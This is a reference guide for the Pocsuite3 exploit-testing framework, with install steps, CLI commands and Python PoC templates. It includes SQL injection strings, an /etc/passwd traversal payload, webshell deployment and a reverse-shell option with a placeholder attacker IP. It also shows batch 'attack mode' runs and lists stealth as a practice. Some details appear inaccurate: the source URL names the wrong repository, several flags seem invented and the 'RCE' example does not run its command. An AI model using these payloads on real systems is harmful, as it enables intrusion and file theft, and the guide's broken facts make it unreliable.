Pocsuite3
Overview
Pocsuite3 is a powerful, open-source vulnerability testing framework written in Python. It provides a comprehensive platform for security researchers to develop, test, and deploy Proof-of-Concept (PoC) exploits. Pocsuite3 supports multiple protocols, payload delivery methods, and includes built-in vulnerability databases, making it ideal for authorized security assessments and research.
Installation
Linux (Debian/Ubuntu)
sudo apt-get install python3 python3-pip
pip3 install pocsuite3Fedora/RHEL
sudo dnf install python3 python3-pip
pip3 install pocsuite3macOS
brew install python3
pip3 install pocsuite3Windows
pip install pocsuite3From Source
git clone https://github.com/projectdiscovery/pocsuite3.git
cd pocsuite3
pip3 install -r requirements.txt
python3 setup.py installVerify Installation
pocsuite3 --version
pocsuite3 --helpCore Concepts
PoC Script Structure
Pocsuite3 PoCs follow a specific framework structure with metadata, options, and verification methods.
Vulnerability Database Integration
Pocsuite3 includes built-in access to:
- Official Pocsuite3 database
- ExploitDB integration
- NVD vulnerability data
- Custom local databases
Payload Delivery Methods
- Direct execution
- WebShell payload delivery
- Reverse shell generation
- Custom payload encoding
Basic Commands
Test Single Target
pocsuite3 -u http://target.com --poc poc_name
pocsuite3 -u http://target.com:8080 --poc vulnerable_cmsTest Multiple Targets
pocsuite3 -f targets.txt --poc poc_name
pocsuite3 -f urls.txt --poc exploit_name -v 2List Available PoCs
pocsuite3 --list
pocsuite3 --list | grep keywordSearch PoC Database
pocsuite3 --search keyword
pocsuite3 --search cve_name
pocsuite3 --search "directory traversal"Common Usage Patterns
| Command | Description |
|---|---|
pocsuite3 -u URL --poc name | Test target with specific PoC |
pocsuite3 -f targets.txt --poc name | Test multiple targets from file |
pocsuite3 -u URL --poc-dir ./pocs | Use custom PoC directory |
pocsuite3 -u URL --poc name -v 2 | Verbose output (level 2) |
pocsuite3 --search keyword | Search PoC database |
pocsuite3 -u URL --poc name --attack | Execute in attack mode |
pocsuite3 -u URL --poc name --verify | Run in verification mode only |
PoC Development
Basic PoC Template
from pocsuite3.api import *
import urllib.request
class PocName(POCBase):
vulID = "CVE-XXXX-XXXXX"
version = "1"
author = ["Your Name"]
vulDate = "2024-01-15"
createDate = "2024-01-16"
updateDate = "2024-01-16"
references = ["https://example.com"]
name = "Vulnerable Application RCE"
appPowerLink = ""
appName = "Vulnerable App"
appVersion = ""
vulType = "Remote Code Execution"
desc = """
Detailed vulnerability description here.
Steps to reproduce and impact assessment.
"""
samples = ["http://target.com"]
install_requires = ["requests"]
def _check(self):
result = {}
try:
resp = requests.get(self.url, timeout=10)
if "vulnerable_string" in resp.text:
result["VerifyInfo"] = {}
result["VerifyInfo"]["URL"] = self.url
except Exception as e:
pass
return self.parse_result(result)
def _exploit(self):
result = {}
payload = "malicious_payload"
try:
resp = requests.post(
self.url,
data={"param": payload},
timeout=10
)
if "success_indicator" in resp.text:
result["ShellInfo"] = {
"URL": self.url,
"Content": resp.text
}
except Exception as e:
pass
return self.parse_result(result)Complete PoC with Parameter Options
from pocsuite3.api import *
class VulnerableAPIPoc(POCBase):
vulID = "CVE-2024-00000"
version = "1.1"
author = ["Security Researcher"]
references = ["https://nvd.nist.gov"]
name = "Vulnerable API Endpoint Exploitation"
appName = "Vulnerable Service"
vulType = "SQL Injection / RCE"
desc = "Detailed vulnerability description"
samples = ["http://example.com"]
def _options(self):
return {
"command": {
"value": "id",
"description": "Command to execute",
"require": False
},
"timeout": {
"value": 10,
"description": "Request timeout",
"require": False
}
}
def _check(self):
result = {}
try:
payload = "' OR '1'='1"
resp = requests.get(
f"{self.url}/api/endpoint",
params={"id": payload}
)
if resp.status_code == 200 and "data" in resp.text:
result["VerifyInfo"] = {"URL": self.url}
except:
pass
return self.parse_result(result)
def _exploit(self):
result = {}
cmd = self.get_option("command")
try:
payload = f"'; exec('{cmd}'); --"
resp = requests.get(
f"{self.url}/api/endpoint",
params={"id": payload}
)
if resp.status_code == 200:
result["ShellInfo"] = {
"URL": self.url,
"Output": resp.text
}
except:
pass
return self.parse_result(result)Running PoCs
Verification Mode (Safe)
pocsuite3 -u http://target.com --poc cve_name --verifyAttack/Exploit Mode
pocsuite3 -u http://target.com --poc cve_name --attackWith Custom Options
pocsuite3 -u http://target.com --poc name -o "command=whoami"
pocsuite3 -u http://target.com --poc name -o "lhost=192.168.1.100,lport=4444"Batch Testing from File
pocsuite3 -f urls.txt --poc cve_name --attack
pocsuite3 -f targets.txt --poc cve_name -v 2 --report report.jsonAdvanced Options
Concurrency Control
pocsuite3 -u http://target.com --poc name --threads 5
pocsuite3 -f targets.txt --poc name --threads 20Output Formats
pocsuite3 -u URL --poc name --report report.json
pocsuite3 -u URL --poc name --report report.html
pocsuite3 -u URL --poc name --report report.txtProxy Configuration
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080
pocsuite3 -u URL --poc name --proxy socks5://127.0.0.1:1080Custom User Agent
pocsuite3 -u URL --poc name --user-agent "Custom UA"Timeout Settings
pocsuite3 -u URL --poc name --timeout 30PoC Database Operations
Update Local Database
pocsuite3 --updateSearch by CVE
pocsuite3 --search CVE-2024-12345
pocsuite3 --search "CVE-2024"Search by Application
pocsuite3 --search "Apache Struts"
pocsuite3 --search "WordPress"Search by Vulnerability Type
pocsuite3 --search "RCE"
pocsuite3 --search "SQL Injection"
pocsuite3 --search "Directory Traversal"Display PoC Details
pocsuite3 --show cve_id
pocsuite3 --show CVE-2024-00000Working with Custom PoCs
Directory Structure
custom_pocs/
├── poc_rce_exploit.py
├── poc_sql_injection.py
├── poc_directory_traversal.py
└── utils/
├── helper.py
└── payloads.txtLoad Custom PoC Directory
pocsuite3 -u http://target.com --poc-dir ./custom_pocs --poc poc_name
pocsuite3 -f targets.txt --poc-dir ./exploits --poc vulnerabilityTest Custom PoC Syntax
pocsuite3 --check-poc ./custom_pocs/poc_name.pyPayload Delivery
Reverse Shell Payload
pocsuite3 -u URL --poc name -o "lhost=attacker_ip,lport=4444"WebShell Deployment
pocsuite3 -u URL --poc webshell_poc -o "shell_path=/uploads/shell.php"Custom Payload Encoding
def _exploit(self):
payload = base64.b64encode(b"command").decode()
resp = requests.post(
f"{self.url}/api",
data={"data": payload}
)Exploitation Techniques
SQL Injection PoC
def _check(self):
result = {}
test_payload = "' OR '1'='1"
resp = requests.get(f"{self.url}?id={test_payload}")
if "error" not in resp.text and len(resp.text) > expected_length:
result["VerifyInfo"] = {"URL": self.url}
return self.parse_result(result)Remote Code Execution PoC
def _exploit(self):
result = {}
cmd = "whoami"
payload = f"{{{{7*7}}}}"
resp = requests.get(f"{self.url}/api?input={payload}")
if "49" in resp.text:
result["ShellInfo"] = {"URL": self.url, "Command": cmd}
return self.parse_result(result)Directory Traversal PoC
def _check(self):
result = {}
traversal_payload = "../../../../etc/passwd"
resp = requests.get(f"{self.url}/download?file={traversal_payload}")
if "root:" in resp.text:
result["VerifyInfo"] = {"URL": self.url}
return self.parse_result(result)Reporting and Output
Generate JSON Report
pocsuite3 -f targets.txt --poc name --report results.jsonGenerate HTML Report
pocsuite3 -f targets.txt --poc name --report results.htmlParse Results
cat results.json | jq '.results[] | {target: .target, vulnerable: .status}'Export Successful Targets
pocsuite3 -f targets.txt --poc name --report results.json
cat results.json | jq '.results[] | select(.status == "success") | .target' > vulnerable_targets.txtVulnerability Scanning Workflow
Step 1: Prepare Target List
cat targets.txt
# http://target1.com
# http://target2.com:8080
# http://target3.com/appStep 2: Search for Relevant PoCs
pocsuite3 --search "web application vulnerability"Step 3: Run Verification
pocsuite3 -f targets.txt --poc cve_name --verifyStep 4: Generate Report
pocsuite3 -f targets.txt --poc cve_name --report assessment.htmlStep 5: Analyze Results
cat assessment.htmlIntegration with Other Tools
With Nuclei
# Export Pocsuite3 findings to file
pocsuite3 -f targets.txt --poc name --report findings.jsonWith Burp Suite
pocsuite3 -u URL --poc name --proxy http://127.0.0.1:8080With Metasploit
# Use Pocsuite3 PoCs alongside Metasploit modules
pocsuite3 -f targets.txt --poc name --report msf_compatible.txtBest Practices
- Authorization: Always obtain written authorization before testing
- Documentation: Document all PoCs with proper references and descriptions
- Testing: Validate PoCs in controlled environments first
- Responsible Disclosure: Follow coordinated disclosure practices
- Version Control: Track PoC changes and updates
- Error Handling: Include proper exception handling in exploit code
- Stealth: Use appropriate timeouts and request patterns
- Verification: Distinguish between verification and exploitation modes
Troubleshooting
Connection Timeout
pocsuite3 -u URL --poc name --timeout 30SSL/TLS Certificate Issues
pocsuite3 -u URL --poc name --verify-ssl falseModule Import Errors
pip3 install -r requirements.txt
pocsuite3 --check-poc poc_name.pyDebugging PoC Execution
pocsuite3 -u URL --poc name -v 3Related Tools
- Nuclei: Template-based vulnerability scanning
- Metasploit: Comprehensive exploitation framework
- Burp Suite: Web application security testing
- OWASP ZAP: Automated security testing
- Exploit-DB: Vulnerability and exploit database